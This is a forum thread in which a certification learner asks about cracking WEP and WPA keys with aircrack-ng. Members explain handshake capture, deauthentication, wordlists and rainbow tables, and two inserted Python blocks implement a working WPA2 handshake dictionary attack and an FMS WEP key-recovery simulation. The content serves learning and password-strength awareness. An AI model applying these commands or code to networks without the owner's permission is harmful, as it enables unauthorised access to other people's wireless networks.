Issues with AIRCRACK-NG and password List

Not sure where else to post this but here.

I have been interested in security for a few years now and am hoping to land a career in this field many more years down the road.

I recently decided that I wanted to learn how to crack a WEP key, for example.
Currently running a few programs like Wireshark and the aircrack-ng package.
I can see different APs and anything that is connected to them while capturing their packets. With that file I would be able to crack it if my list contains that password; if not, I don't believe it's possible. My issue at this point is that my password.lst file only has 230 possible passwords when it checks. When I see the videos online, these guys have thousands of possible passwords listed in their file.


Does anyone know where a file like this can be grabbed? It's just a simple text file with a word on each line. The only difference is the number of possibilities in there. I'm really looking for a text file with the entire dictionary in it.


Any help here is appreciated.
CompTIA A+ Nov 25, 1997
CompTIA Network+ March 7, 2008
MCTS Vista 620 June 14, 2008
MCP Server 290 Nov 15, 2008
MCP Server 291 In Progress (Exam 12/28/09)
Cisco CCENT In Progress
MCP Server 291 In Progress
C|EH In Progress

Comments

  • sexion8 Member Posts: 242
    Google wordlist

    http://wordlist.sourceforge.net/
    "Everything we hear is an opinion, not a fact. Everything we see is a perspective, not the truth." - Marcus Aurelius
  • nevolved Member Posts: 131
    If you really want to crack WEP, then you should download and run BackTrack (it's a Linux version that can be run from CD or USB key, or be installed). It comes configured with all the tools you will need for pen testing. Secondly, don't attempt to crack other people's WEP; that is a felony.
  • dynamik Banned Posts: 12,314
    That's a pretty inefficient way to crack WEP. Aircrack-ng should be all you need.
  • nevolved Member Posts: 131
    Well, it sounds like he wants to investigate pen testing, so why not use a platform that will support that? Is the Windows version going to support packet injection? No, not to mention a whole host of other tools.
  • dynamik Banned Posts: 12,314
    Sorry, I was talking about brute-forcing WEP with dictionary lists, not BT ;)
  • JDMurray MSIT InfoSec, CISSP, SSCP, GSEC, EnCE, C|EH, CySA+, PenTest+, CASP+, Security+ Surf City, USA, Admin Posts: 11,671
    Aircrack-ng is the best. Run it on Linux and make sure you have an approved wireless NIC.

    There is a Windows port of Aircrack-ng, but I've never tried it.
  • Sie Member Posts: 1,195
    I think there's some confusion here.

    A password list is not needed for a WEP crack, only the airmon-ng suite.

    If you're cracking a WPA or WPA2 network you will need a good password list; there are many available, you can search Google for them.

    However, the best current method for WPA cracking is the use of rainbow tables. If you have a very good Internet connection, or risk purchasing the CDs, very large pre-hashed rainbow tables can be obtained from http://rainbowtables.shmoo.com/

    Also, WPA rainbow tables pre-hashed with common ESSIDs can be had at http://www.renderlab.net/projects/WPA-tables/

    I must add, just to cover myself, that you must have permission from the owner of the network. I don't take responsibility, etc.
    Foolproof systems don't take into account the ingenuity of fools
  • ULWiz Member Posts: 722
    Not to be rude about the comment below, but did you seriously just post that?

    I said I am interested in the security aspect of computers.
    Currently working on one last test for MCSA and taking my CCENT here shortly. After those two are attained I plan on finishing my CCNA and then my MCSE. After I have those certs and a few more years of experience I would like to go CEH and CISSP.

    Not for cracking my neighbor's network, which has absolutely nothing of importance. This is purely for learning purposes and to see how things like this work.

    Secondly, don't attempt to crack other people's WEP, that is a felony.

    I find it extremely interesting that I can not be connected to any network, change my wireless card to a different status, and be able to see any WAP and any computer's MAC address.


    Currently my file has about 500K possible password solutions; the last link posted really bumped up my file.

    Appreciate the help.
  • Sie Member Posts: 1,195
    You may have over 500K passwords listed, but you can instantly discount any under 8 characters, as these cannot be used for WPA passwords/passphrases. Bear in mind the password can be anywhere from 8 to 63 characters in length for WPA, if memory serves me correctly.

    Just out of interest how are you going about this?

    Deauthing a client and capturing the 4-way handshake with airodump?

    NB:
    The "do not hack, it's a felony" is required, as I'm sure some armed robbers have gone to gun shops and said "I'm just interested in guns, I wasn't thinking of robbing anywhere". Anyway, I'm sure you get my point; if you're doing nothing illegal, don't take offence.
  • ULWiz Member Posts: 722
    Currently just using the aircrack package on a Linux platform.

    The first thing I did was scan for available networks.
    Second, I ran a command just to watch a single channel and network.
    At this point it opens a capture file.

    I MAC-spoofed my MAC to a wireless client connected to that access point, then deauthorized it.

    Ran a test injection from aircrack and an attack on it, sending auth requests at the AP I am trying to hit.

    From this point on I show a WPA handshake at the MAC of the AP.

    Usually, as long as I have 100k IVs, I would shut down and run a test with my password list on the file.

    That is pretty much all I have gotten so far. I've only been doing this for about 4 days, and there's really not any material on it out there.

    Hope I did not miss any steps there.
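The procedure in the post above (deauth a client, capture the 4-way handshake, run aircrack-ng with a wordlist against the .cap) works because the handshake contains everything needed to test a candidate passphrase offline. The following is an added example, not code from this thread or from aircrack-ng: it reproduces the computation the final aircrack-ng step performs for each word in the list, applies Sie's 8-to-63-character rule before paying for the hashing, and shows why a precomputed PMK table is tied to one ESSID. The SSID, MAC addresses, nonces, EAPOL bytes, wordlist and function names are all constructed for the example; a real run would parse those values out of the capture.

```python
"""Dictionary attack on a WPA2-PSK 4-way handshake: what `aircrack-ng -w list capture.cap`
computes for each candidate once it has found a handshake.

Added example, not the thread's or aircrack-ng's code. Handshake parameters, EAPOL bytes
and the wordlist are constructed; the key derivation (PBKDF2, PRF-512, HMAC-SHA1 MIC)
is the one IEEE 802.11i specifies for WPA2.
"""
import hashlib
import hmac

# --- constructed handshake parameters (a real attack reads these from the .cap) ---
SSID = "linksys"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))                  # nonce from EAPOL message 1 (AP -> client)
SNONCE = bytes(range(32, 64))              # nonce from EAPOL message 2 (client -> AP)
# Simplified stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed.
EAPOL_MSG2_ZEROED = (bytes.fromhex("0103005f02010a00000000000000000001")
                     + SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits). This is the slow
    step, and it depends only on (ssid, passphrase): a precomputed table is per-ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512(PMK, "Pairwise key expansion", min/max of the MACs || min/max of the nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """WPA2/AES (key descriptor version 2): MIC = first 16 bytes of HMAC-SHA1 over the EAPOL
    frame with the MIC field zeroed. WPA1/TKIP uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def mic_for_passphrase(passphrase: str) -> bytes:
    """Plays the legitimate client: the MIC it puts in message 2, which the attacker captures."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2_ZEROED)


def plausible_psk(word: str) -> bool:
    """A WPA passphrase is 8 to 63 printable ASCII characters; anything else in the
    wordlist can be skipped without hashing."""
    return 8 <= len(word) <= 63 and all(32 <= ord(c) <= 126 for c in word)


def build_pmk_table(ssid: str, words) -> dict:
    """The precomputation a per-ESSID table does once: word -> PMK."""
    return {w: pmk_from_passphrase(w, ssid) for w in words if plausible_psk(w)}


def crack_handshake(captured_mic: bytes, words, pmk_table=None):
    """Test each candidate against the captured MIC. Returns (passphrase, candidates tested)
    or (None, candidates tested). With a table for the right ESSID only the cheap PRF and
    HMAC remain per candidate."""
    tried = 0
    for w in words:
        if not plausible_psk(w):
            continue
        tried += 1
        pmk = pmk_table[w] if pmk_table and w in pmk_table else pmk_from_passphrase(w, SSID)
        kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, EAPOL_MSG2_ZEROED), captured_mic):
            return w, tried
    return None, tried


# constructed wordlist; the first two entries are too short to be a WPA passphrase at all
WORDLIST = ["123456", "letmein", "password", "lonestar", "Studio54", "studio54", "trustno1"]

if __name__ == "__main__":
    captured = mic_for_passphrase("studio54")
    print(crack_handshake(captured, WORDLIST))                                   # ('studio54', 4)
    print(crack_handshake(captured, WORDLIST, build_pmk_table(SSID, WORDLIST)))  # same, PBKDF2 done once
    print(crack_handshake(mic_for_passphrase("correct horse battery"), WORDLIST))  # (None, 5)
```

Two things to notice when running it: the short entries never cost a PBKDF2 call, and a table built for "linksys" is useless against a network named anything else, which is why the per-ESSID tables linked earlier in the thread only help against the SSIDs they were built for.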
  • dynamik Banned Posts: 12,314
    Have you looked at this? http://www.aircrack-ng.org/doku.php?id=tutorial

    And as I said earlier, you don't need lists. Aircrack is able to break the encryption based on the data you capture. I guess that's a viable approach if you don't have access to much captured data, but you can usually crack it within a few minutes.
  • Sie Member Posts: 1,195
    Dynamik, you're absolutely correct for WEP; however, I think ULWiz is talking about WPA, which would require a brute force approach, hence the password lists.

    ULWiz, obviously you're doing this on an authorised AP, so why not add the known passphrase to your password lists to ensure you're doing the correct steps?

    As for there being little material out there, you must be missing both the aircrack site itself:

    http://www.aircrack-ng.org/doku.php?id=airmon-ng

    and the Remote Exploit Forums:

    http://forums.remote-exploit.org/

    Creators of BackTrack.

    [Edit
    Haha, just noticed Dynamik posted the aircrack link as well.
    And 6800+ posts? Your fingers stubs yet, bud?
    /Edit]
  • ULWiz Member Posts: 722
    I have looked at it, but did not see a command that would just crack the WPA.

    The only way I have been able to do it was to crack it if it was currently in my password.lst file.

    The average capture file I have filled was about 130MB in size, with 100k-something packets captured.
  • ULWiz Member Posts: 722
    I did actually run the scan first on my .cap file with the password not being in the list. The program said the key was not found. I tried adding my physical WPA password to the file and it did crack that as the actual passphrase.
  • ULWiz Member Posts: 722
    Dynamik, mind posting the command you see for this? Because I don't see it.
  • Sie Member Posts: 1,195
    So you're doing it all right by the sounds of it, just needing better password lists.

    Really, the best option is rainbow tables; take a look at the links I posted above.

    The passwords per second you get from rainbow tables compared to just password lists is amazing.

    If those are too big for you, or you want to continue using just password lists, check the Remote Exploit forums, as there are posts there containing links to wordlists.
    ULWiz wrote:
    Dynamik, mind posting the command you see for this? Because I don't see it.

    To be fair to Dynamik, you did state this at the beginning, and his response was correct.
    ULWiz wrote:
    I recently decided that I wanted to learn how to crack a WEP key, for example.
  • ULWiz Member Posts: 722
    Currently running another scan on a previous capture. Added some more word lists to it. Will keep you posted on how big it actually is.
  • dynamik Banned Posts: 12,314
    Sie wrote:
    Dynamik, you're absolutely correct for WEP; however, I think ULWiz is talking about WPA, which would require a brute force approach, hence the password lists.

    You were the first one to mention WPA, and that was in the 9th post. When did we switch over to that?

    UL, are you trying to crack WEP or WPA?

    Here's another article for you: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
  • ULWiz Member Posts: 722
    Dynamik, my first post was geared towards WEP. I am actually interested in both. Currently I'm trying for a WPA, which is my home network. I could always switch my own to WEP to learn that.

    Is there a difference in commands for each one?

    I am pretty much doing the following:

    aircrack-ng -w ulwiz.lst output-01.cap

    This begins my crack with my current password list.

    Not sure how else to do it.

    I will take a look at the link you just posted.
  • LarryDaMan Member Posts: 797
    dynamik wrote:
    Sie wrote:
    Dynamik, you're absolutely correct for WEP; however, I think ULWiz is talking about WPA, which would require a brute force approach, hence the password lists.

    You were the first one to mention WPA, and that was in the 9th post. When did we switch over to that?

    UL, are you trying to crack WEP or WPA?

    Here's another article for you: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

    Yeah, I was going to say the same thing. This started as a WEP crack which is MUCH easier.
  • Sie Member Posts: 1,195
    dynamik wrote:
    Sie wrote:
    Dynamik, you're absolutely correct for WEP; however, I think ULWiz is talking about WPA, which would require a brute force approach, hence the password lists.

    You were the first one to mention WPA, and that was in the 9th post. When did we switch over to that?

    UL, are you trying to crack WEP or WPA?

    Here's another article for you: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

    He mentioned password lists and was talking about them. WEP doesn't need that, so I just assumed he meant WPA!

    It's your fault, ULWiz!! Haha.

    Yes WEP and WPA are different.

    WEP only requires the capture of enough data packets (IVs), and aircrack can crack this without a password list.

    WPA requires you to capture a four-way handshake and run aircrack with a password list against the cap file, essentially running a brute force password crack.
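To show why WEP needs only captured IVs and no wordlist (the point made in the post above, and the reason dynamik can say a busy network falls in minutes), here is an added example, not code from this thread or from aircrack-ng, that simulates the Fluhrer-Mantin-Shamir (FMS) attack on RC4's key schedule, the technique aircrack-ng's original WEP cracking was built on (it has since moved to the faster PTW method, but the principle is the same: every frame carries its 3-byte IV in the clear, the first plaintext byte is always the 0xAA SNAP header, and enough such frames leak the secret key byte by byte). The 40-bit key, the IVs and the frames are constructed, as are the function names; to keep the run short the simulated AP is also made to send only IVs that are weak for the byte under attack, standing in for the millions of random IVs a real capture needs before enough weak ones show up.

```python
"""Why WEP falls to IV collection alone: a simulation of the FMS attack on RC4's
key schedule, the idea behind aircrack-ng's statistical WEP cracking.

Added example, not the thread's or aircrack-ng's code. The 40-bit key, the IVs the AP
emits and the frames are constructed. The attacker only uses what is visible on the air:
each frame's IV and its first ciphertext byte, which XORed with the known 0xAA SNAP
header byte gives the first keystream byte.
"""

SNAP_FIRST_BYTE = 0xAA                     # first plaintext byte of every WEP data frame
SECRET_KEY = bytes.fromhex("1f8a03c72b")   # constructed 40-bit WEP key (never shown to the attacker)
KEY_LEN = len(SECRET_KEY)


def rc4_first_byte(key: bytes) -> int:
    """Full RC4 key schedule (KSA) followed by one PRGA step; returns keystream byte 0."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    j = S[1]                               # PRGA with i = 1
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def partial_ksa(known: bytes):
    """KSA restricted to the key bytes the attacker already knows (IV plus recovered bytes).
    Returns the state S and the value of j after len(known) steps."""
    S = list(range(256))
    j = 0
    for i, k in enumerate(known):
        j = (j + S[i] + k) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def is_resolved(S, a: int) -> bool:
    """FMS 'resolved' condition after a KSA steps: from here the first keystream byte equals
    S[a] with probability about 5%, and S[a] is fixed by the unknown key byte K[a]."""
    return S[1] < a and ((S[1] + S[S[1]]) & 0xFF) == a


def simulate_capture(secret_key: bytes):
    """The victim AP. It emits only the IV families (a, 255, x) and (a, 254, x), which are
    resolved for key byte a-3; a real capture needs millions of random IVs to collect as
    many resolved ones. Returns what the attacker sees: (IV, first ciphertext byte)."""
    frames = []
    for a in range(3, 3 + len(secret_key)):
        for y in (254, 255):
            for x in range(256):
                iv = bytes([a, y, x])
                c0 = rc4_first_byte(iv + secret_key) ^ SNAP_FIRST_BYTE
                frames.append((iv, c0))
    return frames


def fms_recover(frames, key_len: int, fudge: int = 3):
    """Recover the secret key byte by byte by voting over resolved IVs. Like aircrack-ng's
    fudge factor, the top `fudge` candidates per byte are tried depth-first, and a full key
    is accepted only if it reproduces the observed keystream bytes."""
    def verify(key: bytes) -> bool:
        return all(rc4_first_byte(iv + key) ^ SNAP_FIRST_BYTE == c0 for iv, c0 in frames[:16])

    def search(recovered: bytes):
        if len(recovered) == key_len:
            return recovered if verify(recovered) else None
        a = 3 + len(recovered)             # index of the key byte under attack (IV is bytes 0..2)
        votes = [0] * 256
        for iv, c0 in frames:
            if iv[0] != a:
                continue
            S, j = partial_ksa(iv + recovered)
            if not is_resolved(S, a):
                continue
            z = c0 ^ SNAP_FIRST_BYTE                       # known plaintext -> keystream byte 0
            votes[(S.index(z) - j - S[a]) & 0xFF] += 1    # K[a] = S^-1[z] - j - S[a]
        for cand in sorted(range(256), key=lambda v: -votes[v])[:fudge]:
            found = search(recovered + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


FRAMES = simulate_capture(SECRET_KEY)

if __name__ == "__main__":
    key = fms_recover(FRAMES, KEY_LEN)
    print("recovered:", key.hex() if key else None, "correct:", key == SECRET_KEY)
```

Each recovered byte only makes the next one attackable, which is why the attack is purely a matter of how many frames you have sitting in the capture: no candidate passphrases are ever involved, unlike the WPA handshake case.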
  • JDMurray MSIT InfoSec, CISSP, SSCP, GSEC, EnCE, C|EH, CySA+, PenTest+, CASP+, Security+ Surf City, USA, Admin Posts: 11,671
    Sie wrote:
    WPA requires you to capture a four-way handshake and run aircrack with a password list against the cap file, essentially running a brute force password crack.
    Well, good luck with that. No WPA-PSK passphrase I've ever used has appeared in any dictionary. It would take pure brute force or nothing.

    And if you are using a password list, dictionary, or rainbow tables you aren't performing a brute force attack. You're just iterating through a lookup table, not trying every possible value of a key space.
  • Sie Member Posts: 1,195
    JDMurray wrote:
    Sie wrote:
    WPA requires you to capture a four-way handshake and run aircrack with a password list against the cap file, essentially running a brute force password crack.
    Well, good luck with that. No WPA-PSK passphrase I've ever used has appeared in any dictionary. It would take pure brute force or nothing.

    I agree, I never said they would be there, but up till now I haven't heard of an alternative for WPA. It all depends on the admin who set up the AP and their choice of passphrase.

    Also, thanks for pointing out that error.
    It in fact isn't a brute force; it is purely a dictionary/password-list-based attack. It's a looooooooong night.
  • JDMurray MSIT InfoSec, CISSP, SSCP, GSEC, EnCE, C|EH, CySA+, PenTest+, CASP+, Security+ Surf City, USA, Admin Posts: 11,671
    Sie wrote:
    Also, thanks for pointing out that error.
    It in fact isn't a brute force; it is purely a dictionary/password-list-based attack. It's a looooooooong night.
    No worries. Studying for the CISSP has got me nit-picking over the slightest details. I'll laugh out loud if I get a question on my exam about password cracking using brute force and lookup tables.
  • ULWiz Member Posts: 722
    Well, just wanted to make another post on my experience with this.

    So at this point, from what I understand, I can't crack a WPA key unless that exact phrase is in my password.lst file. This is strictly for WPA keys, though.

    Got to my friend's house last night, who currently only has a WEP key. Asked him if he would let me try and get in.

    Started a capture on his router and 30 minutes later I stopped the capture on him.
    Ran an aircrack command on the file I captured with his BSSID.

    Within a few seconds I had a key. Added that key to my wireless card and was able to connect to his network. Overall this process took me 35 minutes to get on.

    Really can't believe this was so simple, and I can definitely understand why they had to move to WPA keys and a more secure standard.
  • ULWiz Member Posts: 722
    So over this weekend I was at a few of my friends' houses and they let me attempt to get their access keys on both WPA and WEP setups.

    For the attempt on the WEP I captured him just checking out random YouTube vids. Captured for 30 minutes and quit. At that point the capture file was around 30MB. Ran the aircrack against his BSSID and had a key within 15 seconds. Took that key and attempted to get on.
    Not sure how many IVs you actually need to capture for a WEP crack attempt.

    For the WPA attempt on my other friend's network, it of course needs to go against my personal password list. So far I am still not sure how big my file is. The last one broke on the 612,906th word in my file, so I would assume I am close to around 800k possibilities. Captured on him for a while again. Got a fake WPA handshake and stopped the capture on him as well. Ran aircrack again against my password list and did not have a key before I left his house. When we got to the diner 30 minutes later it had his passphrase. Called him this morning to confirm the key and it was correct.

    So WEP can always be cracked as long as enough is captured in the air. A WPA key is almost luck, depending on how many possible passwords you have in that file. Running a complex password with symbols and lower case and upper case letters is definitely key for keeping things safe.

    Anyways, just wanted to share my learning experience on this.
  • dynamik Banned Posts: 12,314
    You can actually have it crack WEP in real time, so you don't have to wait for it to capture a certain amount, stop, and then try to crack it with what you have. A network with decent traffic should only take about 5-10 minutes.

    It's pretty funny that you got into his WPA as well though. So was it just a dictionary word/phrase, or was it semi-random characters? What was the length?

    I got mine from here: https://www.grc.com/passwords.htm If you're ever in MN, you're welcome to stop by and give it a try.

    Do you have any idea how long it took me to enter that into my Wii with that stupid remote?
  • mamono Member Posts: 776
    dynamik wrote:
    I got mine from here: https://www.grc.com/passwords.htm If you're ever in MN, you're welcome to stop by and give it a try.

    I use the same source for my WPA passphrase and for all the WPA passphrases for any wifi networks that I setup. PITA when the passphrase gets lost, IMHO. Try writing that on a post-it to put on the router. Thank goodness for write protected USB thumb drives!

    dynamik wrote:
    Do you have any idea how long it took me to enter that into my Wii with that stupid remote?

    Not just the Wii, but also the Nintendo DS and PSP!
  • ULWiz Member Posts: 722
    dynamik, that is what I have been wondering myself. How many people actually use a standard word for a password? My one friend's was lonestar while the other's was studio54. Both were in the file I put together.

    It was definitely an interesting experience and I did learn a little from it.